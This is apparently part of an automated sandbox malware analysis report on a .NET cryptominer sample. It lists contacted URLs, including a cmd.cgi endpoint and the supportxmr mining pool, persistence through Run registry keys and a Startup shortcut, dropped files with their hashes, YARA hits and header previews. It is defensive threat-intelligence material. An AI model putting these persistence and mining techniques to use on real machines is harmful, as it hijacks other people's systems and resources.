                        http://www.jiyu-kobo.co.jp/icroVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.jiyu-kobo.co.jp/6wVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395584229.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comVsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.galapagosdesign.com/Vsob3IooE7.exe, 00000000.00000003.397493268.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.397352751.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/XVsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comFVsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/(wVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.comueTFVsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/jp/Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/ZwVsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comlVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.urwpp.deegVsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/Vsob3IooE7.exe, 00000000.00000003.394136612.0000000006265000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.394272189.000000000626A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://192.168.100.115/cmd.cgi?Vsob3IooE7.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cnVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/Y0/Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/rVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395584229.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395007888.0000000006277000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.monotype.Vsob3IooE7.exe, 00000000.00000003.397352751.000000000626C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Vsob3IooE7.exe, 00000000.00000003.395007888.0000000006277000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.comoVsob3IooE7.exe, 00000000.00000003.398298313.0000000006278000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.424132747.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.398207029.0000000006278000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comalicVsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/~wVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comue9Vsob3IooE7.exe, 00000000.00000003.398298313.0000000006278000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.424132747.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.398207029.0000000006278000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  141.94.96.144
                                  		pool-fr.supportxmr.comGermany
                                  		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse

                                  General Information

                                  Joe Sandbox Version:37.1.0 Beryl
                                  Analysis ID:873923
                                  Start date and time:2023-05-23 16:29:13 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 58s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:12
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:Vsob3IooE7.exe
                                  Original Sample Name:e7bf9f0c2c1977ddd8e139c13c27be0d.exe
                                  Detection:MAL
                                  Classification:mal100.expl.evad.mine.winEXE@13/3@1/1
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 88%
                                  • Number of executed functions: 44
                                  • Number of non-executed functions: 24
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240s for sample files taking high CPU consumption

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                  • Execution Graph export aborted for target Vsob3IooE7.exe, PID 2068 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  16:30:18API Interceptor1x Sleep call for process: Vsob3IooE7.exe modified
                                  16:30:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                  16:30:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                  16:30:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  141.94.96.144GameBar.exeGet hashmaliciousXmrigBrowse
                                    FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                                      file.exeGet hashmaliciousXmrigBrowse
                                        GoogleUpdate.exeGet hashmaliciousXmrigBrowse
                                          d.pyGet hashmaliciousPwnRig MinerBrowse
                                            PYnsVrS3EX.exeGet hashmaliciousXmrigBrowse
                                              DHL Original Documents.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                                xxx.elfGet hashmaliciousXmrigBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  pool-fr.supportxmr.comruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                  • 141.94.96.71
                                                  GameBar.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  file.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  file.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.144
                                                  GoogleUpdate.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.144
                                                  KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.195
                                                  WvWlWr2HC0.exeGet hashmaliciousLoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRATBrowse
                                                  • 141.94.96.144
                                                  spread.exeGet hashmaliciousETERNALBLUE, XmrigBrowse
                                                  • 141.94.96.144
                                                  target.ps1Get hashmaliciousXmrigBrowse
                                                  • 141.94.96.144
                                                  Activator.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.144
                                                  d.pyGet hashmaliciousPwnRig MinerBrowse
                                                  • 141.94.96.71
                                                  file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                  • 141.94.96.195
                                                  PYnsVrS3EX.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  PYnsVrS3EX.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  file.exeGet hashmaliciousRHADAMANTHYS, RedLine, XmrigBrowse
                                                  • 141.94.96.71
                                                  DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                                  • 141.94.96.71
                                                  DHL Original Documents.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                                  • 141.94.96.144
                                                  file.exeGet hashmaliciousRHADAMANTHYS, Vidar, XmrigBrowse
                                                  • 141.94.96.71
                                                  file.exeGet hashmaliciousPrivateLoader, RHADAMANTHYS, XmrigBrowse
                                                  • 141.94.96.71

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseMTSpago3242142023.xlsGet hashmaliciousGuLoaderBrowse
                                                  • 141.94.149.125
                                                  D4EATj8S1c.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 141.9.112.43
                                                  c7n8Y8b877.elfGet hashmaliciousUnknownBrowse
                                                  • 212.201.156.65
                                                  xyK0juuSuG.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 134.77.67.255
                                                  ruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                  • 141.94.96.195
                                                  GameBar.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.144
                                                  SPL242523535252525235.xlsGet hashmaliciousFormBookBrowse
                                                  • 141.94.149.125
                                                  feobBkGOei.elfGet hashmaliciousMiraiBrowse
                                                  • 195.37.8.77
                                                  VsAKb3sxAu.elfGet hashmaliciousMiraiBrowse
                                                  • 141.65.230.90
                                                  iHDZW6bttX.elfGet hashmaliciousMiraiBrowse
                                                  • 193.174.13.220
                                                  OBBVGwjkM1.elfGet hashmaliciousMiraiBrowse
                                                  • 141.60.164.212
                                                  FWcYZPr3YJ.elfGet hashmaliciousUnknownBrowse
                                                  • 141.65.242.27
                                                  p1FejiLL02.elfGet hashmaliciousMiraiBrowse
                                                  • 130.183.198.220
                                                  xoeNOJm8Gu.elfGet hashmaliciousUnknownBrowse
                                                  • 130.183.251.24
                                                  UiodpDMy4N.elfGet hashmaliciousUnknownBrowse
                                                  • 141.9.224.167
                                                  UI721.bin.exeGet hashmaliciousAgentTesla, LockBit ransomware, LummaC Stealer, RedLine, TrojanRansom, zgRATBrowse
                                                  • 141.94.149.125
                                                  x86.elfGet hashmaliciousUnknownBrowse
                                                  • 149.201.32.191
                                                  P1sYDU1Ihc.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 134.28.97.169
                                                  D9auh16sL0.elfGet hashmaliciousUnknownBrowse
                                                  • 132.253.146.54
                                                  yJNmeNWeST.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 193.174.114.255

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                    file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                      WvWlWr2HC0.exeGet hashmaliciousLoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRATBrowse
                                                        file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                          8ulUl36eYw.exeGet hashmaliciousFabookie, ManusCrypt, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, TofseeBrowse
                                                            file.exeGet hashmaliciousRedLine, XmrigBrowse
                                                              2CH4QX76nU.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                                mQRqXgFxJR.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                                  tIH5DUSVGF.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                                    rnFMPDf3RV.exeGet hashmaliciousLoaderBot RedLine XmrigBrowse
                                                                      VJO8DJVqC0.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                                        lcDlB6uuzr.exeGet hashmaliciousLoaderBot RedLine XmrigBrowse
                                                                          3Yfr0pHudU.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                                            5622_1647967473_729.exeGet hashmaliciousXmrigBrowse
                                                                              2862_1647970205_130.exeGet hashmaliciousXmrigBrowse
                                                                                SGH9m3w8Hx.exeGet hashmaliciousXmrigBrowse
                                                                                  WQw4XERnFl.exeGet hashmaliciousXmrigBrowse
                                                                                    8vprKeDXuJ.exeGet hashmaliciousRedLine XmrigBrowse
                                                                                      4nmeEJrZJ9.exeGet hashmaliciousPhoenix Stealer XmrigBrowse
                                                                                        DmpOiwahZV.exeGet hashmaliciousRedLine XmrigBrowse

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Vsob3IooE7.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1314
                                                                                          Entropy (8bit):5.350128552078965
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                          MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                          SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                          SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                          SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe>), ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):166
                                                                                          Entropy (8bit):5.0924278210562015
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:HRAbABGQYm5uOUkh4EaKC5SQnRrF0rIJ4ovstwWDUWJRWz9F06kiWXU:HRYFVmwO9aZ5lZGEJlvstwWDNJAZG6kW
                                                                                          MD5:47B8F4176A78D858A4ABE8C9DC2FCA69
                                                                                          SHA1:6EF87AC0E0944352F520E48FBBDC944F8D91AC90
                                                                                          SHA-256:794E872B8C7B8C2B8D9199EAD7C66F39DA421F3C54A816DCD6C696F45E6BCEB0
                                                                                          SHA-512:951118DDE1499EAEFDDD6A282FCC58BA71688E9F72F93820FBA24CF6298CB85D53E5903AE12D0DDE50C2D9D476C8C46CC94A79B796C9052CEDDF0655D83CF5F7
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: URL_File_Local_EXE, Description: Detects an .url file that points to a local executable, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, Author: Florian Roth (Nextron Systems)
                                                                                          • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                                                                          Reputation:low
                                                                                          Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe..IconIndex=0..IconFile=C:\Users\user\Desktop\Vsob3IooE7.exe\backup (3).ico..

                                                                                          C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                          Category:dropped
                                                                                          Size (bytes):4141064
                                                                                          Entropy (8bit):5.210440836800201
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
                                                                                          MD5:02569A7A91A71133D4A1023BF32AA6F4
                                                                                          SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
                                                                                          SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                                                                                          SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: ruZVRNvu0Y.exe, Detection: malicious, Browse
                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                          • Filename: WvWlWr2HC0.exe, Detection: malicious, Browse
                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                          • Filename: 8ulUl36eYw.exe, Detection: malicious, Browse
                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                          • Filename: 2CH4QX76nU.exe, Detection: malicious, Browse
                                                                                          • Filename: mQRqXgFxJR.exe, Detection: malicious, Browse
                                                                                          • Filename: tIH5DUSVGF.exe, Detection: malicious, Browse
                                                                                          • Filename: rnFMPDf3RV.exe, Detection: malicious, Browse
                                                                                          • Filename: VJO8DJVqC0.exe, Detection: malicious, Browse
                                                                                          • Filename: lcDlB6uuzr.exe, Detection: malicious, Browse
                                                                                          • Filename: 3Yfr0pHudU.exe, Detection: malicious, Browse
                                                                                          • Filename: 5622_1647967473_729.exe, Detection: malicious, Browse
                                                                                          • Filename: 2862_1647970205_130.exe, Detection: malicious, Browse
                                                                                          • Filename: SGH9m3w8Hx.exe, Detection: malicious, Browse
                                                                                          • Filename: WQw4XERnFl.exe, Detection: malicious, Browse
                                                                                          • Filename: 8vprKeDXuJ.exe, Detection: malicious, Browse
                                                                                          • Filename: 4nmeEJrZJ9.exe, Detection: malicious, Browse
                                                                                          • Filename: DmpOiwahZV.exe, Detection: malicious, Browse
                                                                                          Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......^.........."...........k.....N2.........@.............................P........?... ..................................................0..P....@..../...W.......>..:...........................................................0...............................MPRESS1. ...............................MPRESS2.....0...........................rsrc...../..@..../.................@..............................................................v2.19..L...H...(.@.......H.......H.....`..f.@....H....O..H..(..0...&......*.....4%. 0.h. <...W..3.3.A...(.....1(.....0 ...0@.......`..N..Q.......w.....3.H...]K..X.ev.u. [.? L._.k\...........G..q\....Q..@. ......_0...+.........!.8..X0.W....t.".I.%. .. .............~.....~....S.~Cp.W:~..................O.A ...p\........L..`..O..........3.i.e...lA..A.....H...I;..|.....O=.p....-..........3..K/.. ~.@.Q0G.."...Q......)..(..".!......@..P.)...%O.H.1......X0......G.X.XP....^Q..5|^2.E

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.8010200183533485
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:Vsob3IooE7.exe
                                                                                          File size:2842624
                                                                                          MD5:e7bf9f0c2c1977ddd8e139c13c27be0d
                                                                                          SHA1:e91aff3d9a8c7cef0e9543350864971e4ad93f82
                                                                                          SHA256:a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
                                                                                          SHA512:d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
                                                                                          SSDEEP:49152:552sxwTr/VsoJteujcnqNwelN/z52r7zj9n0cqv/3SYd:55jxa3JteujcncNNQzj9hqXCY
                                                                                          TLSH:A9D5CF7C86B50EB7D0F7C7E457C4B817BAADAB33B10C9A2145D2439D026F96224DE42E
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P..V+.........2t+.. ....+...@.. ........................+...........@................................

                                                                                          File Icon

                                                                                          Icon Hash:90cececece8e8eb0

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x6b7432
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0xA019F57F [Fri Feb 12 14:36:47 2055 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
